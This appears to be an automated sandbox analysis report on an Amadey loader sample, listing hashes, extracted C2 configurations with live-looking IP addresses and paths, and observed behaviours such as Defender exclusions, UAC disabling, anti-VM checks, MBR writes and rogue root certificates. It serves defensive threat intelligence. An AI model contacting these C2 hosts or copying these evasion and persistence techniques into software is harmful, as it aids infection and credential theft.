amadey | 0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2

Analysis

max time kernel
53s
max time network
149s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
21/05/2024, 05:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe
Size

1.5MB
MD5

5f6cc5c2a02f480d65ac2d5099c817a2
SHA1

a84798a529637c82abf7611e7da43c2d56132223
SHA256

0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2
SHA512

892f44fb92cc3c085e98c31f0b6b68d7a78884181678932f9f359089108acbc6e3b833e0970412b8387cd4bfa1af976d7c13fa24ec71e5e8a13be8ed8eaf39b3
SSDEEP

49152:ip5jP5asMvTwIzd5Llb+LuOhY+ZVZN8we/V:g53InzHLlanhpZ58wet

Score

10^/10

amadey privateloader redline risepro 1 18befc c767c0 bootkit evasion execution infostealer loader persistence stealer themida trojan

Malware Config

Extracted

Family

amadey

Version

4.20

Botnet

18befc

http://5.42.96.141

Attributes

install_dir
908f070dff
install_file
explorku.exe
strings_key
b25a9385246248a95c600f9a061438e1
url_paths
/go34ko8/index.php

rc4.plain

Extracted

Family

amadey

Version

4.20

Botnet

c767c0

http://5.42.96.7

Attributes

install_dir
7af68cdb52
install_file
axplons.exe
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
url_paths
/zamo7h/index.php

rc4.plain

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

redline

Botnet

185.215.113.67:26260

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	rMK6lP8pCPR2ZN98wR3VYof4.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00060000000162c9-111.dat	family_redline
behavioral1/memory/808-129-0x0000000000380000-0x00000000003D2000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5e4913c117.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cb34b3b35f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amers.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2752	powershell.exe
3056	powershell.exe
2556	powershell.exe
3248	powershell.exe
2588	powershell.exe
3292	powershell.exe
3628	powershell.EXE
2208	powershell.exe
1956	powershell.exe
2812	powershell.exe
3400	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cb34b3b35f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5e4913c117.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5e4913c117.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cb34b3b35f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amers.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amers.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe

Executes dropped EXE 38 IoCs

pid	Process
2612	explorku.exe
2880	amers.exe
2180	axplons.exe
1948	5e4913c117.exe
2764	alex.exe
808	redline1.exe
1128	cb34b3b35f.exe
2260	install.exe
2192	GameService.exe
1980	GameService.exe
2624	GameService.exe
2556	GameService.exe
2528	GameService.exe
2648	GameSyncLink.exe
2164	826643.exe
2700	swizzzz.exe
2240	GameService.exe
2436	GameService.exe
2216	GameService.exe
2228	GameService.exe
2808	GameService.exe
1080	PiercingNetLink.exe
2060	file300un.exe
1520	GameService.exe
1012	GameService.exe
1556	gold.exe
1128	GameService.exe
1952	GameService.exe
608	GameSyncLinks.exe
2356	693706.exe
2352	Newoff.exe
2664	FirstZ.exe
1992	lumma1234.exe
2888	oNqPE9PHMgA7eaKzT63BcN1N.exe
1832	TdKAq2r6YWficbH1Cbq6I4oo.exe
2064	rMK6lP8pCPR2ZN98wR3VYof4.exe
2256	dUyzkvVWSie4yYqhTWgCXSqI.exe
600	Install.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Wine	amers.exe
Key opened	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Wine	cb34b3b35f.exe

Loads dropped DLL 61 IoCs

pid	Process
1664	0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe
2612	explorku.exe
2612	explorku.exe
2880	amers.exe
2612	explorku.exe
2180	axplons.exe
2180	axplons.exe
488	WerFault.exe
488	WerFault.exe
488	WerFault.exe
2180	axplons.exe
2612	explorku.exe
2180	axplons.exe
2552	cmd.exe
2528	GameService.exe
2528	GameService.exe
2648	GameSyncLink.exe
2164	826643.exe
2180	axplons.exe
2180	axplons.exe
2772	WerFault.exe
2772	WerFault.exe
2772	WerFault.exe
2808	GameService.exe
2808	GameService.exe
2180	axplons.exe
2180	axplons.exe
2180	axplons.exe
2180	axplons.exe
924	WerFault.exe
924	WerFault.exe
924	WerFault.exe
1952	GameService.exe
1952	GameService.exe
608	GameSyncLinks.exe
2180	axplons.exe
2352	Newoff.exe
2352	Newoff.exe
2180	axplons.exe
2180	axplons.exe
2316	WerFault.exe
2316	WerFault.exe
2316	WerFault.exe
1728	WerFault.exe
1728	WerFault.exe
1728	WerFault.exe
1728	WerFault.exe
1728	WerFault.exe
2424	regsvcs.exe
2888	oNqPE9PHMgA7eaKzT63BcN1N.exe
2424	regsvcs.exe
2424	regsvcs.exe
2424	regsvcs.exe
2424	regsvcs.exe
2256	dUyzkvVWSie4yYqhTWgCXSqI.exe
2256	dUyzkvVWSie4yYqhTWgCXSqI.exe
2256	dUyzkvVWSie4yYqhTWgCXSqI.exe
2256	dUyzkvVWSie4yYqhTWgCXSqI.exe
600	Install.exe
600	Install.exe
600	Install.exe

Themida packer 31 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/1664-0-0x0000000000E30000-0x000000000131D000-memory.dmp	themida
behavioral1/memory/1664-2-0x0000000000E30000-0x000000000131D000-memory.dmp	themida
behavioral1/memory/1664-3-0x0000000000E30000-0x000000000131D000-memory.dmp	themida
behavioral1/memory/1664-1-0x0000000000E30000-0x000000000131D000-memory.dmp	themida
behavioral1/memory/1664-4-0x0000000000E30000-0x000000000131D000-memory.dmp	themida
behavioral1/memory/1664-7-0x0000000000E30000-0x000000000131D000-memory.dmp	themida
behavioral1/memory/1664-6-0x0000000000E30000-0x000000000131D000-memory.dmp	themida
behavioral1/memory/1664-5-0x0000000000E30000-0x000000000131D000-memory.dmp	themida
behavioral1/files/0x0007000000014dae-14.dat	themida
behavioral1/memory/2612-24-0x0000000001250000-0x000000000173D000-memory.dmp	themida
behavioral1/memory/2612-26-0x0000000001250000-0x000000000173D000-memory.dmp	themida
behavioral1/memory/2612-27-0x0000000001250000-0x000000000173D000-memory.dmp	themida
behavioral1/memory/2612-25-0x0000000001250000-0x000000000173D000-memory.dmp	themida
behavioral1/memory/2612-23-0x0000000001250000-0x000000000173D000-memory.dmp	themida
behavioral1/memory/2612-22-0x0000000001250000-0x000000000173D000-memory.dmp	themida
behavioral1/memory/2612-20-0x0000000001250000-0x000000000173D000-memory.dmp	themida
behavioral1/memory/1664-19-0x0000000000E30000-0x000000000131D000-memory.dmp	themida
behavioral1/memory/2612-21-0x0000000001250000-0x000000000173D000-memory.dmp	themida
behavioral1/files/0x0006000000015d24-67.dat	themida
behavioral1/memory/1948-77-0x0000000000DA0000-0x0000000001425000-memory.dmp	themida
behavioral1/memory/1948-78-0x0000000000DA0000-0x0000000001425000-memory.dmp	themida
behavioral1/memory/1948-79-0x0000000000DA0000-0x0000000001425000-memory.dmp	themida
behavioral1/memory/1948-81-0x0000000000DA0000-0x0000000001425000-memory.dmp	themida
behavioral1/memory/1948-80-0x0000000000DA0000-0x0000000001425000-memory.dmp	themida
behavioral1/memory/1948-84-0x0000000000DA0000-0x0000000001425000-memory.dmp	themida
behavioral1/memory/1948-85-0x0000000000DA0000-0x0000000001425000-memory.dmp	themida
behavioral1/memory/1948-83-0x0000000000DA0000-0x0000000001425000-memory.dmp	themida
behavioral1/memory/1948-82-0x0000000000DA0000-0x0000000001425000-memory.dmp	themida
behavioral1/memory/2612-106-0x0000000001250000-0x000000000173D000-memory.dmp	themida
behavioral1/memory/2612-152-0x0000000001250000-0x000000000173D000-memory.dmp	themida
behavioral1/memory/1948-229-0x0000000000DA0000-0x0000000001425000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\5e4913c117.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000014001\\5e4913c117.exe"	explorku.exe

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5e4913c117.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	pastebin.com
21	pastebin.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
71	api.myip.com
72	api.myip.com
77	ipinfo.io
78	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	oNqPE9PHMgA7eaKzT63BcN1N.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rMK6lP8pCPR2ZN98wR3VYof4.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rMK6lP8pCPR2ZN98wR3VYof4.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rMK6lP8pCPR2ZN98wR3VYof4.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	rMK6lP8pCPR2ZN98wR3VYof4.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
2880	amers.exe
2180	axplons.exe
1128	cb34b3b35f.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2060 set thread context of 2424	2060	file300un.exe	91

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorku.job	0922dbdd3f5461945b2fdb4d0c6b21dadb42625fecc141c2eb889011046335d2_NeikiAnalytics.exe
File created	C:\Windows\Tasks\axplons.job	amers.exe

Launches sc.exe 33 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2408	sc.exe
2212	sc.exe
2220	sc.exe
1560	sc.exe
2296	sc.exe
2216	sc.exe
932	sc.exe
2408	sc.exe
3184	sc.exe
3456	sc.exe
1576	sc.exe
2440	sc.exe
1580	sc.exe
1720	sc.exe
2992	sc.exe
1020	sc.exe
3560	sc.exe
3360	sc.exe
2628	sc.exe
2420	sc.exe
344	sc.exe
3144	sc.exe
2636	sc.exe
2904	sc.exe
1292	sc.exe
1364	sc.exe
3424	sc.exe
2232	sc.exe
1364	sc.exe
1692	sc.exe
1812	sc.exe
3176	sc.exe
3520	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
488	2764	WerFault.exe	34
2772	2700	WerFault.exe	53
924	1556	WerFault.exe	71
2316	1992	WerFault.exe	86

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2596	schtasks.exe
1376	schtasks.exe
3868	schtasks.exe
3352	schtasks.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	redline1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	redline1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	rMK6lP8pCPR2ZN98wR3VYof4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	rMK6lP8pCPR2ZN98wR3VYof4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	rMK6lP8pCPR2ZN98wR3VYof4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	rMK6lP8pCPR2ZN98wR3VYof4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	rMK6lP8pCPR2ZN98wR3VYof4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f7